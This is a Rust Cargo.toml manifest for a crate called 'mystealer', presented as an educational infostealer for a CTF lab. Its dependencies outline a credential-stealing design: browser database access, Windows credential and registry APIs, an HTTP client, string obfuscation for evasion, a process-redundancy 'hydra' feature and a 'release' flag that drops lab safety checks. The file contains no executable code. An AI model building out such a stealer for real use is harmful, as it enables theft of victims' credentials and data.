[package]
name = "mystealer"
version = "0.2.0"
edition = "2021"
authors = ["CTF Lab"]
description = "Educational infostealer for CTF lab - EDUCATIONAL PURPOSES ONLY"
readme = "README.md"
license = "MIT"

[features]
default = ["lab-mode"]
lab-mode = []  # Ativa verificações de segurança obrigatórias
release = []   # Remove verificações (NUNCA usar fora do lab)
hydra = []     # Ativa sistema de redundância de processos

[dependencies]
# Async runtime
tokio = { version = "1.35", features = ["full"] }

# Serialização
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"

# Criptografia
aes-gcm = "0.10"
argon2 = "0.5"
rand = "0.8"
base64 = "0.21"

# Data e tempo
chrono = { version = "0.4", features = ["serde"] }

# Identificadores
uuid = { version = "1.6", features = ["v4", "serde"] }

# Erros
thiserror = "1.0"
anyhow = "1.0"

# Logging
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter"] }

# HTTP client
reqwest = { version = "0.11", features = ["json", "rustls-tls"], default-features = false }

# Diretórios do sistema
dirs = "5.0"

# Informações do sistema
sysinfo = "0.30"
whoami = "1.4"

# Regex para busca de arquivos
regex = "1.10"
walkdir = "2.4"

# Hash
sha2 = "0.10"
hex = "0.4"

# SQLite (browser data)
rusqlite = { version = "0.31", features = ["bundled"] }

# CLI
clap = { version = "4.4", features = ["derive"] }

# ===========================================
# OBFUSCATION & EVASION (CTF Realistic)
# ===========================================

# Goldberg - String/Code obfuscation macros
goldberg = "0.1"

# Obfstr - Runtime string obfuscation
obfstr = "0.4"

[target.'cfg(windows)'.dependencies]
windows = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_Security",
    "Win32_Security_Credentials",
    "Win32_System_Threading",
    "Win32_System_SystemInformation",
    "Win32_System_Registry",
    "Win32_System_DataExchange",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_Debug",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Networking_WinSock",
]}

[target.'cfg(unix)'.dependencies]
nix = { version = "0.27", features = ["user", "process"] }

[dev-dependencies]
tempfile = "3.9"

[profile.release]
lto = true
codegen-units = 1
panic = "abort"
strip = true
opt-level = "z"

[profile.dev]
debug = true
opt-level = 0

